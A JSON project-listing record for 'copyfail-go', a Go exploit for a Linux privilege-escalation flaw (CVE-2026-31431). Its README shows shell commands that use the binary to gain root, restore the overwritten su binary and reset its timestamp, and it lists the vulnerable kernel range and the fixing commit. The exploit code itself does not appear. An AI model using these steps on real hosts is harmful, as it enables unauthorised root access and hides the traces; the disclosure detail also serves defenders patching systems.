[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"project-1160":3},{"id":4,"name":5,"fullName":6,"owner":7,"repo":5,"description":8,"homepage":9,"htmlUrl":9,"language":10,"languages":9,"totalLinesOfCode":9,"stars":11,"forks":12,"watchers":13,"openIssues":13,"contributorsCount":14,"subscribersCount":14,"size":14,"stars1d":14,"stars7d":13,"stars30d":15,"stars90d":14,"forks30d":14,"starsTrendScore":14,"compositeScore":16,"rankGlobal":9,"rankLanguage":9,"license":17,"archived":18,"fork":18,"defaultBranch":19,"hasWiki":20,"hasPages":18,"topics":21,"createdAt":9,"pushedAt":9,"updatedAt":22,"readmeContent":23,"aiSummary":24,"trendingCount":14,"starSnapshotCount":14,"syncStatus":25,"lastSyncTime":26,"discoverSource":27},1160,"copyfail-go","badsectorlabs\u002Fcopyfail-go","badsectorlabs","A Go implementation of copyfail (CVE-2026-31431)",null,"Assembly",353,76,1,0,8,5.66,"MIT License",false,"main",true,[],"2026-06-12 02:00:24","# CopyFail Go\n\n> Most Linux LPEs need a race window or a kernel-specific offset. Copy Fail is a straight-line logic flaw — it needs neither. The same ~~732-byte Python script~~ static Go binary roots every Linux distribution shipped since 2017.\n\nA Go implementation of CVE-2026-31431. 
In case you need a static binary and no Python dependency.\n\nSee [copy.fail](https:\u002F\u002Fcopy.fail) for more info.\n\n## Interactive shell\n\n```shell\n# Get the binary to your Linux host with code execution (exercise for the reader)\nuser@host$ chmod +x copyfail-go\nuser@host$ .\u002Fcopyfail-go --backup \u002Ftmp\u002Fsu\nroot@host# cat \u002Ftmp\u002Fsu > \u002Fusr\u002Fbin\u002Fsu    # Restore the original su binary\nroot@host# touch -r \u002Ftmp\u002Fsu \u002Fusr\u002Fbin\u002Fsu # Restore the modified time of the original su\nroot@host# rm \u002Ftmp\u002Fsu\nroot@host# # Do things as root =)\n```\n\n## Run binary as root\n\nUseful to elevate a program to root.\n\n```shell\n# Get the binary to your Linux host with code execution (exercise for the reader)\nuser@host$ chmod +x copyfail-go\nuser@host$ .\u002Fcopyfail-go --backup \u002Ftmp\u002Fsu --exec .\u002Fyour-binary\nuser@host$ # Use whatever you ran to restore su from \u002Ftmp\u002Fsu\n```\n\n## Don't trust those hex blobs?\n\nCompile the payloads yourself with `payloads\u002Fbuild-n-print.sh` on a Debian host (Debian 13 tested).\n\nYou'll need to `apt install nasm python3 binutils-aarch64-linux-gnu binutils-arm-linux-gnueabihf`, then run the script from inside the payloads directory. It will compile each payload and output the zlib-compressed hex strings. 
Compare those to what is in `main.go` (or replace them with your own) and build the `copyfail-go` binaries with `goreleaser build --snapshot --clean` from the main project directory.\n\n## Affected kernels (from [copy-fail-c](https:\u002F\u002Fgithub.com\u002Ftgies\u002Fcopy-fail-c\u002Ftree\u002Fmain#affected-kernels))\n\n```\nfloor:    torvalds\u002Flinux 72548b093ee3   August 2017, v4.14\n                                        (AF_ALG iov_iter rework that\n                                         introduced the file-page write\n                                         primitive via splice into the AEAD\n                                         scatterlist)\n\nceiling:  torvalds\u002Flinux a664bf3d603d   April 2026, mainline\n                                        (reverts the 2017 algif_aead\n                                         in-place optimization; separates\n                                         source and destination scatterlists\n                                         so page-cache pages can no longer\n                                         be a writable crypto destination)\n```\n\nIn between: every major distro kernel that didn't backport the fix.\nUbuntu, RHEL, SUSE, Amazon Linux, and Debian were all confirmed vulnerable\nin their stock cloud-image kernels at disclosure time. Distro-level\nbackports started rolling out around 2026-04-29 alongside the public\ndisclosure. To verify whether a target kernel is in-window, check whether\n`a664bf3d603d` (or its distro-specific backport) is present in the kernel's\ngit log or the distro's changelog.\n","CopyFail Go is a Go implementation that exploits CVE-2026-31431, intended to provide a static binary for escalating privileges on Linux systems. Its core functionality achieves privilege escalation through a logic flaw rather than a race condition or kernel-specific offsets, and it applies to most Linux distributions released since 2017. Technically, its key parts are written in Assembly, and it runs without depending on a Python environment. The tool is well suited to security-testing scenarios that require executing code on a target Linux host and obtaining root privileges. Users can compile the payloads in the project to build their own binaries, ensuring their security and reliability.",2,"2026-06-11 02:41:59","CREATED_QUERY"]